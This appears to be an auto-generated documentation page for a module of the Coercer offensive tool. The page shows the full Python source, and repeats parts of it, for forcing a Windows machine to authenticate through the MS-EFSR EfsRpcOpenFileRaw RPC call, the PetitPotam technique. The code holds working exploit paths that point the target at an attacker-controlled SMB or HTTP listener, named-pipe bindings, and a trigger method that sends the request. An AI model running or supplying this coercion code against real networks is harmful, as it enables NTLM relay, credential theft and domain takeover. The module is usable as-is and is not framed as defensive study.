coercer.methods.MS_EFSR.EfsRpcOpenFileRaw

  1#!/usr/bin/env python3
  2# -*- coding: utf-8 -*-
  3# File name          : EfsRpcOpenFileRaw.py
  4# Author             : Podalirius (@podalirius_)
  5# Date created       : 16 Sep 2022
  6
  7
  8from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
  9from coercer.network.DCERPCSessionError import DCERPCSessionError
 10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
 11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID
 12
 13
 14class _EfsRpcOpenFileRaw(NDRCALL):
 15    """
 16    Structure to make the RPC call to EfsRpcOpenFileRaw() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
 17    """
 18    opnum = 0
 19    structure = (
 20        ('FileName', WSTR),  # Type: wchar_t *
 21        ('Flags', LONG),     # Type: long
 22    )
 23
 24
 25class _EfsRpcOpenFileRawResponse(NDRCALL):
 26    """
 27    Structure to parse the response of the RPC call to EfsRpcOpenFileRaw() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
 28    """
 29    structure = ()
 30
 31
 32class EfsRpcOpenFileRaw(MSPROTOCOLRPCCALL):
 33    """
 34    Coercing a machine to authenticate using function EfsRpcOpenFileRaw (opnum 0) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
 35
 36    Method found by:
 37     - [@topotam77](https://twitter.com/topotam77)
 38    """
 39
 40    exploit_paths = [
 41        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 42        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 43        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
 44        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
 45    ]
 46
 47    access = {
 48        "ncan_np": [
 49            {
 50                "namedpipe": r"\PIPE\efsrpc",
 51                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
 52                "version": "1.0"
 53            },
 54            {
 55                "namedpipe": r"\PIPE\lsarpc",
 56                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 57                "version": "1.0"
 58            },
 59            {
 60                "namedpipe": r"\PIPE\samr",
 61                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 62                "version": "1.0"
 63            },
 64            {
 65                "namedpipe": r"\PIPE\lsass",
 66                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 67                "version": "1.0"
 68            },
 69            {
 70                "namedpipe": r"\PIPE\netlogon",
 71                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 72                "version": "1.0"
 73            },
 74        ]
 75    }
 76
 77    protocol = {
 78        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
 79        "shortname": "MS-EFSR"
 80    }
 81
 82    function = {
 83        "name": "EfsRpcOpenFileRaw",
 84        "opnum": 0,
 85        "vulnerable_arguments": ["FileName"]
 86    }
 87
 88    def trigger(self, dcerpc_session, target):
 89        if dcerpc_session is not None:
 90            try:
 91                request = _EfsRpcOpenFileRaw()
 92                request['FileName'] = self.path
 93                request['Flags'] = 0
 94                resp = dcerpc_session.request(request)
 95                return ""
 96            except Exception as err:
 97                return err
 98        else:
 99            print("[!] Error: dce is None, you must call connect() first.")
100            return None
class EfsRpcOpenFileRaw(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
 33class EfsRpcOpenFileRaw(MSPROTOCOLRPCCALL):
 34    """
 35    Coercing a machine to authenticate using function EfsRpcOpenFileRaw (opnum 0) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
 36
 37    Method found by:
 38     - [@topotam77](https://twitter.com/topotam77)
 39    """
 40
 41    exploit_paths = [
 42        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 43        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 44        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
 45        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
 46    ]
 47
 48    access = {
 49        "ncan_np": [
 50            {
 51                "namedpipe": r"\PIPE\efsrpc",
 52                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
 53                "version": "1.0"
 54            },
 55            {
 56                "namedpipe": r"\PIPE\lsarpc",
 57                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 58                "version": "1.0"
 59            },
 60            {
 61                "namedpipe": r"\PIPE\samr",
 62                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 63                "version": "1.0"
 64            },
 65            {
 66                "namedpipe": r"\PIPE\lsass",
 67                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 68                "version": "1.0"
 69            },
 70            {
 71                "namedpipe": r"\PIPE\netlogon",
 72                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 73                "version": "1.0"
 74            },
 75        ]
 76    }
 77
 78    protocol = {
 79        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
 80        "shortname": "MS-EFSR"
 81    }
 82
 83    function = {
 84        "name": "EfsRpcOpenFileRaw",
 85        "opnum": 0,
 86        "vulnerable_arguments": ["FileName"]
 87    }
 88
 89    def trigger(self, dcerpc_session, target):
 90        if dcerpc_session is not None:
 91            try:
 92                request = _EfsRpcOpenFileRaw()
 93                request['FileName'] = self.path
 94                request['Flags'] = 0
 95                resp = dcerpc_session.request(request)
 96                return ""
 97            except Exception as err:
 98                return err
 99        else:
100            print("[!] Error: dce is None, you must call connect() first.")
101            return None

Coercing a machine to authenticate using function EfsRpcOpenFileRaw (opnum 0) of MS-EFSR Protocol

Method found by:

def trigger(self, dcerpc_session, target):
 89    def trigger(self, dcerpc_session, target):
 90        if dcerpc_session is not None:
 91            try:
 92                request = _EfsRpcOpenFileRaw()
 93                request['FileName'] = self.path
 94                request['Flags'] = 0
 95                resp = dcerpc_session.request(request)
 96                return ""
 97            except Exception as err:
 98                return err
 99        else:
100            print("[!] Error: dce is None, you must call connect() first.")
101            return None